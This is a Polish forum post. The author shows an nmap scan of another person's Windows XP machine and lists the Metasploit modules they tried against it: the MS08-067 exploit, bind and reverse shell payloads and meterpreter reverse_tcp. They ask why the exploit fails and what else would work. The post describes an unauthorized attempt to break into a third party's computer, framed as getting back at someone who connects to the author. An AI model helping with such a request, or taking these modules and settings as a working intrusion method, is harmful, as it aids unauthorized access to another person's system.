Cześć. Mam pewien problem z kolesiem który się do mnie podpina i myśli że nic nie widzę. Więc przeskanowałem mu porty i wyszło to
Kod:
PORT STATE SERVICE VERSION
113/tcp filtered ident
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
2068/tcp filtered advocentkvm
3517/tcp filtered 802-11-iapp
4126/tcp filtered ddrepl
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Próbowałem wysłać exploit przez metasplot. Korzystałem z
exploit/windows/smb/ms08_067_netapi
payload/windows/speak_pwned
generic/shell_bind_tcp
generic/shell_reverse_tcp
windows/meterpreter/reverse
exploit/windows/meterpreter/reverse_tcp
Wszystko się kończy fiaskiem i zatrzymuje się tylko na tym:
Kod:
Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Starting the payload handler...
Próbowałem zmienić inny port , set lport 4444, i pod system set TARGET 1 dlatego że metasploit pokazuje system windows ble ble a nie XP. Nie wiem co jest nie tak że nie działa, albo microsoft już wszystko połatał. Ewentualnie jakieś dobre zabezpieczenie jest. Ktoś coś doradzi, czy jest inny sposób?